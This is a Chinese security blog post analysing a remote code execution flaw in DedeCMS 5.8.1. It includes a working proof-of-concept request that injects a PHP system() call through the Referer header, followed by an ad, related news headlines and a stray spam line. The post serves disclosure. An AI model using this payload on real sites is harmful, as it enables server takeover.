創作中心

5.8.1 RCE漏洞

VSole2021-10-05 19:21:38

漏洞分析:

在include\common.func.php文件中的ShowMsg函數存在模板注入

$gourl = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';

從Referer頭中取值，然后進行渲染，造成RCE

$tpl = new DedeTemplate();
$tpl->LoadString($msg);

POC

GET /plus/flink.php?dopost=save&c=whoami HTTP/1.1
Host: 10.211.55.3
Referer: <?php "system"($c);die;/*

使用了ShowMsg函數,且參數為-1的文件，均可造成RCE

源碼下載地址下載地址:https://github.com/dedecms/DedeCMS/releases/tag/v5.8.1

參考文章:

https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html

另外推一下騰訊云的輕量云服務器

https://curl.qcloud.com/l0OukCM6 2核4G內存8M帶寬74塊1年,不需要新用戶,只要沒用過輕量服務器即可購買

漏洞

撤稿糾錯

本作品采用《CC 協議》，轉載必須注明作者和本文鏈接

漏洞修復廠商Vicarius獲3000萬美元B輪融資

2024-01-19 08:43:45

該公司吸引的總投資金額已超過5600萬美元，新一輪融資將主要用于加速公司在全球范圍內的擴張，并支持其從北美到歐洲不斷增長的全球客戶群，同時也將支持推進AI路線和產品技術創新。

Google Chrome WebRTC堆緩沖區溢出漏洞安全風險通告

2023-12-22 11:40:38

漏洞概述漏洞名稱Google Chrome WebRTC 堆緩沖區溢出漏洞漏洞編號QVD-2023-48180，CVE-2023-7024公開時間2023-12-20影響量級千萬級奇安信評級高危CVSS 3.1分數8.8威脅類型代碼執行、拒絕服務利用可能性高POC狀態未公開在野利用狀態已發現EXP狀態未公開技術細節狀態未公開利用條件：需要用戶交互。01 漏洞詳情影

漏洞分析 CVE-2010-0249

2023-11-25 17:50:17

漏洞分析 CVE-2010-0249

Coremail與國家信息安全漏洞庫（CNNVD）達成深度合作！

2023-11-06 13:43:31

漏洞信息共享合作單位證書近日，Coremail獲得由國家信息安全漏洞庫（CNNVD）頒發的“CNNVD漏洞信息共享合作單位”證書。此證書是國家權威機構對Coremail安全研究技術和漏洞挖掘技術實力的充分肯定，也是雙方合作的里程碑。國家信息安全漏洞庫（CNNVD），為負責建設運維的國家級信息安全漏洞數據管理平臺，旨在為我國信息安全保障提供服務。 “

漏洞預警 CraftCMS遠程代碼執行漏洞

2023-09-22 14:44:07

漏洞預警 CraftCMS遠程代碼執行漏洞

不是我懶，王者級漏洞真不用修！

2023-08-29 09:16:34

漏洞排查與處置，是安全管理員在安全運營中都會碰到的問題，常見卻很難做好。

漏洞補丁無效！梭子魚安全網關仍被黑客攻擊

2023-08-28 16:11:13

美國聯邦調查局于近日警告稱，梭子魚電子郵件安全網關（ESG）的一個重要遠程命令注入漏洞的補丁 "無效"，已打補丁的設備仍在不斷受到攻擊。

漏洞PoC框架Nuclei的圖形版- Fiora

2023-08-11 14:33:54

點擊上方藍字關注安全知識引言Fiora：漏洞PoC框架Nuclei的圖形版。快捷搜索PoC、一鍵運行Nu

全球92萬臺！RouterOS漏洞曝光：設備面臨大規模攻擊

2023-08-03 09:38:48

Mikrotik RouterOS操作系統不支持暴力保護，默認的“admin”用戶密碼在2021年10月之前是空字符串。更讓人震驚的是，檢測CVE-2023-30799的利用“幾乎不可能”，因為RouterOS web和Winbox接口實現了自定義加密，而威脅檢測系統Snort和Suricata無法解密和檢查這些加密。

VSole

網絡安全專家

亚洲欧美自拍唯美另类